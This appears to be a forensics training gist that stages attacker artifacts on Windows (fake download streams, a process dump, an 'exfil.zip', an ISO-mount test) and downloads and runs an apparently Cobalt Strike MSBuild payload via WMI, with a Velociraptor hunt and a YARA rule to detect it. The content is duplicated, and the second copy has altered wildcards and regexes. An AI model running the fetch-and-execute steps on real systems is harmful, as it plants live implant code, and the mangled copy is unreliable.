mgreen27/01_ntfs.ps1

## 01_ntfs.ps1
### NTFS exercise setup

## 1. download some files to test various content and add ADS to simulate manual download from a browser

$downloads = (
    "https://live.sysinternals.com/PsExec64.exe",
    "https://live.sysinternals.com/procdump64.exe",
    "https://live.sysinternals.com/sdelete64.exe"
)

foreach ( $url in $downloads){
    "Downloading " + $Url
    $file = Split-Path $Url -Leaf
    $dest = "C:\PerfLogs\" +$file
    $ads =  "[ZoneTransfer]`r`nZoneId=3`r`nReferrerUrl=https://18.220.58.123/yolo/`r`nHostUrl=https://18.220.58.123/yolo/" + $file + "`r`n"

    Remove-Item -Path $dest -force -ErrorAction SilentlyContinue
    Invoke-WebRequest -Uri $Url -OutFile $dest -UseBasicParsing
    Set-Content -Path $dest":Zone.Identifier" $ads
}

## 2.Create a PS1 file in staging folder (any text will do but this is powershell extension)
echo "Write-Host ‘this is totally a resident file’" > C:\Perflogs\test.ps1

## 3.Modify shortname on a file
fsutil file setshortname C:\PerfLogs\psexec64.exe fake.exe

## 4. Aadd ads
echo "just a file" > C:\PerfLogs\text.txt
Get-Content C:\Windows\notepad.exe |  Set-Content C:\PerfLogs\text.txt:notepad.exe

## 5. Create a process dumpOpen calculator (calc.exe)
calc.exe ; start-sleep 2
C:\PerfLogs\procdump64.exe -accepteula -ma win32calc C:\PerfLogs\calc.dmp
get-process | where-object { $_.Name -like "*win32calc*" } | Stop-Process

## 6. Create a zip file in staging folder
Compress-Archive -Path C:\PerfLogs\* -DestinationPath C:\PerfLogs\exfil.zip -CompressionLevel Fastest

## 7. Delete dmp,zip and ps1 files - deleted file discovery is important for later!
Remove-Item -Path C:\PerfLogs\*.zip, C:\PerfLogs\*.dmp, C:\PerfLogs\*.ps1

## 02_iso_evtx.ps1
### Atomic red team T1553.005 ISO mount exercise setup

$dest = "c:\Users\public\AllTheThings.iso"
New-Item -Type Directory (split-path $dest) -ErrorAction ignore | Out-Null

Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile $dest

Mount-DiskImage -ImagePath $dest -StorageType ISO -Access ReadOnly
$keep = Get-Volume -FileSystemLabel "AllTheThings"
$driveLetter = ($keep | Get-Volume).DriveLetter
$instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
$instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)
Start-Sleep -Seconds 1
Dismount-DiskImage -ImagePath $dest | Out-Null

## 03_MSBuild.ps1
## MSBuild setup
# 0. If server disable prefetch so we generate prefetch artifacts
if ( $(Get-CimInstance -Class CIM_OperatingSystem).Caption -like "*Server*" ) {
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /t REG_DWORD /d 3 /f
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Prefetcher" /v MaxPrefetchFiles /t REG_DWORD /d 8192 /f
    Enable-MMAgent –OperationAPI -ErrorAction SilentlyContinue
    Start-Service Sysmain -ErrorAction SilentlyContinue
}

# 1. Download payload
$Url = "https://gist.githubusercontent.com/mgreen27/a8efb0dada3fefe85603a7ae281fd9a4/raw/4b24259040bb1870824e778690c22c88de11ec0d/kUgJI.TMP"
$dest = "\\127.0.0.1\C$\Windows\Temp\kUgJI.TMP"
Remove-Item -Path $dest -Force -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri $Url -Outfile $dest -UseBasicParsing

# 2. Execute payload
Invoke-WmiMethod -ComputerName 127.0.0.1 -Name Create -Class Win32_PROCESS "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Temp\kUgJI.TMP /noconsolelogger"

## 03_MSBuild.vql
/*
# 5. Final XOR decode
*/

LET HUNTID='<ADD HUNT ID>'

-- find flow ids for each client
LET hunt_flows = SELECT *, Flow.client_id as ClientId, Flow.session_id as FlowId
FROM hunt_flows(hunt_id=HUNTID)
LET hostname(clientid) = SELECT os_info.hostname as Hostname FROM clients(client_id=clientid) --hostname(clientid=ClientId)[0].Hostname as Hostname,

-- extract uploaded files and path on server
Let targets = SELECT  * FROM foreach(row=hunt_flows,
    query={
        SELECT
            hostname(clientid=ClientId)[0].Hostname as Hostname,
            file_store(path=vfs_path) as SamplePath,
            file_size as SampleSize
        FROM uploads(client_id=ClientId,flow_id=FlowId)
    })


-- regex to extract Data and Key fields
LET target_regex = 'buff = new byte\\[\\]\\s*{(?P<Data>[^\\n]*)};\\s+byte\\[\\]\\s+key_code = new byte\\[\\]\\s*{(?P<Key>[^\\n]*)};\\n'
-- normalise function to fix bad hex strings
LET normalise_hex(value) = regex_replace(source=value,re='0x(.)[,}]',replace='0x0\$1,')

-- extract bytes
LET bytes <= SELECT * FROM foreach(row=targets,
    query={
        SELECT
            Hostname,
            SamplePath, basename(path=SamplePath) as Sample, SampleSize,
            unhex(string=regex_replace(re="0x|,", replace="", source=normalise_hex(value=Key))) as KeyBytes,
            read_file(filename=
                unhex(string=regex_replace(re="0x|,", replace="", source=normalise_hex(value=Data))),
                    accessor='data') as DataBytes
        FROM parse_records_with_regex(
            file=SamplePath,buffer_size=15000000,
            regex=target_regex)
    })
-- pass bytes to cobalt strike parser and format key indicators im interested in
SELECT *, FROM foreach(row=bytes,query={
    SELECT *,
        basename(path=SamplePath) as Sample,SampleSize, Hostname
    FROM Artifact.Windows.Carving.CobaltStrike(TargetBytes=xor(key=KeyBytes,string=DataBytes))
})

## 03_MSBuild.yar
rule MSBuild_template {
   meta:
      description = "MSBuild template. Detects MSBuild variable setup and generic template strings."
   strings:
      $s1  = "byte[] key_code = new byte[" ascii
      $s2  = "byte[] buff = new byte[" ascii
      $s8  = "<Code Type=\"Class\" Language=\"cs\">" ascii
      $s9  = "<![CDATA[" ascii
      $s10 = "[DllImport(" ascii

   condition:
      ( uint16(0) == 0x3c0a or uint8(0) == 0x3c ) // \n< or < at 0
      and any of ($s*)
}
	### NTFS exercise setup

	## 1. download some files to test various content and add ADS to simulate manual download from a browser

	$downloads = (
	"https://live.sysinternals.com/PsExec64.exe",
	"https://live.sysinternals.com/procdump64.exe",
	"https://live.sysinternals.com/sdelete64.exe"
	)

	foreach ( $url in $downloads){
	"Downloading " + $Url
	$file = Split-Path $Url -Leaf
	$dest = "C:\PerfLogs\" +$file
	$ads = "[ZoneTransfer]`r`nZoneId=3`r`nReferrerUrl=https://18.220.58.123/yolo/`r`nHostUrl=https://18.220.58.123/yolo/" + $file + "`r`n"

	Remove-Item -Path $dest -force -ErrorAction SilentlyContinue
	Invoke-WebRequest -Uri $Url -OutFile $dest -UseBasicParsing
	Set-Content -Path $dest":Zone.Identifier" $ads
	}

	## 2.Create a PS1 file in staging folder (any text will do but this is powershell extension)
	echo "Write-Host ‘this is totally a resident file’" > C:\Perflogs\test.ps1

	## 3.Modify shortname on a file
	fsutil file setshortname C:\PerfLogs\psexec64.exe fake.exe

	## 4. Aadd ads
	echo "just a file" > C:\PerfLogs\text.txt
	Get-Content C:\Windows\notepad.exe \| Set-Content C:\PerfLogs\text.txt:notepad.exe

	## 5. Create a process dumpOpen calculator (calc.exe)
	calc.exe ; start-sleep 2
	C:\PerfLogs\procdump64.exe -accepteula -ma win32calc C:\PerfLogs\calc.dmp
	get-process \| where-object { $_.Name -like "win32calc" } \| Stop-Process

	## 6. Create a zip file in staging folder
	Compress-Archive -Path C:\PerfLogs\* -DestinationPath C:\PerfLogs\exfil.zip -CompressionLevel Fastest

	## 7. Delete dmp,zip and ps1 files - deleted file discovery is important for later!
	Remove-Item -Path C:\PerfLogs\.zip, C:\PerfLogs\.dmp, C:\PerfLogs\*.ps1
	### Atomic red team T1553.005 ISO mount exercise setup

	$dest = "c:\Users\public\AllTheThings.iso"
	New-Item -Type Directory (split-path $dest) -ErrorAction ignore \| Out-Null

	Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/AllTheThings.iso -OutFile $dest

	Mount-DiskImage -ImagePath $dest -StorageType ISO -Access ReadOnly
	$keep = Get-Volume -FileSystemLabel "AllTheThings"
	$driveLetter = ($keep \| Get-Volume).DriveLetter
	$instance = [activator]::CreateInstance([type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}"))
	$instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0)
	Start-Sleep -Seconds 1
	Dismount-DiskImage -ImagePath $dest \| Out-Null
	## MSBuild setup
	# 0. If server disable prefetch so we generate prefetch artifacts
	if ( $(Get-CimInstance -Class CIM_OperatingSystem).Caption -like "Server" ) {
	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /t REG_DWORD /d 3 /f
	reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Prefetcher" /v MaxPrefetchFiles /t REG_DWORD /d 8192 /f
	Enable-MMAgent –OperationAPI -ErrorAction SilentlyContinue
	Start-Service Sysmain -ErrorAction SilentlyContinue
	}

	# 1. Download payload
	$Url = "https://gist.githubusercontent.com/mgreen27/a8efb0dada3fefe85603a7ae281fd9a4/raw/4b24259040bb1870824e778690c22c88de11ec0d/kUgJI.TMP"
	$dest = "\\127.0.0.1\C$\Windows\Temp\kUgJI.TMP"
	Remove-Item -Path $dest -Force -ErrorAction SilentlyContinue
	Invoke-WebRequest -Uri $Url -Outfile $dest -UseBasicParsing

	# 2. Execute payload
	Invoke-WmiMethod -ComputerName 127.0.0.1 -Name Create -Class Win32_PROCESS "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Temp\kUgJI.TMP /noconsolelogger"
	/*
	# 5. Final XOR decode
	*/

	LET HUNTID='<ADD HUNT ID>'

	-- find flow ids for each client
	LET hunt_flows = SELECT *, Flow.client_id as ClientId, Flow.session_id as FlowId
	FROM hunt_flows(hunt_id=HUNTID)
	LET hostname(clientid) = SELECT os_info.hostname as Hostname FROM clients(client_id=clientid) --hostname(clientid=ClientId)[0].Hostname as Hostname,

	-- extract uploaded files and path on server
	Let targets = SELECT * FROM foreach(row=hunt_flows,
	query={
	SELECT
	hostname(clientid=ClientId)[0].Hostname as Hostname,
	file_store(path=vfs_path) as SamplePath,
	file_size as SampleSize
	FROM uploads(client_id=ClientId,flow_id=FlowId)
	})


	-- regex to extract Data and Key fields
	LET target_regex = 'buff = new byte\\[\\]\\s{(?P<Data>[^\\n])};\\s+byte\\[\\]\\s+key_code = new byte\\[\\]\\s{(?P<Key>[^\\n])};\\n'
	-- normalise function to fix bad hex strings
	LET normalise_hex(value) = regex_replace(source=value,re='0x(.)[,}]',replace='0x0\$1,')

	-- extract bytes
	LET bytes <= SELECT * FROM foreach(row=targets,
	query={
	SELECT
	Hostname,
	SamplePath, basename(path=SamplePath) as Sample, SampleSize,
	unhex(string=regex_replace(re="0x\|,", replace="", source=normalise_hex(value=Key))) as KeyBytes,
	read_file(filename=
	unhex(string=regex_replace(re="0x\|,", replace="", source=normalise_hex(value=Data))),
	accessor='data') as DataBytes
	FROM parse_records_with_regex(
	file=SamplePath,buffer_size=15000000,
	regex=target_regex)
	})
	-- pass bytes to cobalt strike parser and format key indicators im interested in
	SELECT *, FROM foreach(row=bytes,query={
	SELECT *,
	basename(path=SamplePath) as Sample,SampleSize, Hostname
	FROM Artifact.Windows.Carving.CobaltStrike(TargetBytes=xor(key=KeyBytes,string=DataBytes))
	})
	rule MSBuild_template {
	meta:
	description = "MSBuild template. Detects MSBuild variable setup and generic template strings."
	strings:
	$s1 = "byte[] key_code = new byte[" ascii
	$s2 = "byte[] buff = new byte[" ascii
	$s8 = "<Code Type=\"Class\" Language=\"cs\">" ascii
	$s9 = "<![CDATA[" ascii
	$s10 = "[DllImport(" ascii

	condition:
	( uint16(0) == 0x3c0a or uint8(0) == 0x3c ) // \n< or < at 0
	and any of ($s*)
	}